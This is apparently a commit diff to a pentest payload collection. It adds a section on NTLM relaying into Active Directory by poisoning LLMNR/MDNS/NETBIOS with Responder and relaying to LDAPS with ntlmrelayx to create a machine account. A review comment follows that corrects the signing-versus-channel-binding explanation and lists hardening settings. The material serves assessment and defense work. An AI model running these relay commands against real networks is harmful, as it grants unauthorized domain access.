mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Add injection into AD through ldap signing not required and ldap channel binding disabled
This commit is contained in:
parent
8b543c80aa
commit
0f4d747913
@ -69,6 +69,7 @@
- [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes)
- [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
- [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
- [LDAP signing not required and LDAP channel binding disabled](#ldap-signing-not-required-and-ldap-channel-binding-disabled)
- [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
- [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
- [Drop the MIC](#drop-the-mic)
@ -2162,6 +2163,23 @@ msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > show targets
```
### LDAP signing not required and LDAP channel binding disabled
During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed:
* LDAP signing not required (by default set to `Not required`)
* LDAP channel binding is disabled. (by default disabled)
* `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default)
Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer.
```bash
# On first terminal
sudo ./Responder.py -I eth0 -wfrd -P -v
# On second terminal
sudo python ./ntlmrelayx.py -t ldaps://IP_DC --add-computer
```
It is required here to relay to LDAP over TLS because creating accounts is not allowed over an unencrypted connection.
### SMB Signing Disabled and IPv4
If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning**
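Review bot: The heading and the first two requirement bullets name LDAP signing, but the command relays to `ldaps://IP_DC`, and the closing sentence explains that TLS is mandatory for account creation. Those two statements do not line up: the LDAP signing requirement applies to the plain `ldap://` service, so for the LDAPS target shown here the control that actually decides whether the relay succeeds is LDAP channel binding. The section should say so explicitly, e.g. "with `--add-computer` the relay must go to `ldaps://`, so only the channel binding setting matters; the signing setting matters when relaying to `ldap://`". Two smaller points: the `ms-DS-MachineAccountQuota` bullet reads as if the quota were set per account, but it is a single domain attribute (default 10) counted against machine accounts the relayed user has already created, so "at least 1" should be phrased as "the relayed user must still have unused quota"; and since the bullets already state the defaults, it would help readers doing an audit to state the hardening in the same place: set LDAP server signing to Require signing, set LDAP channel binding to Always, and set `ms-DS-MachineAccountQuota` to 0. Grammar in the intro paragraph: "During a security assessment we sometimes do not have any account to perform the audit. We can then inject ourselves into Active Directory by performing an NTLM relay attack; three requirements must be met:".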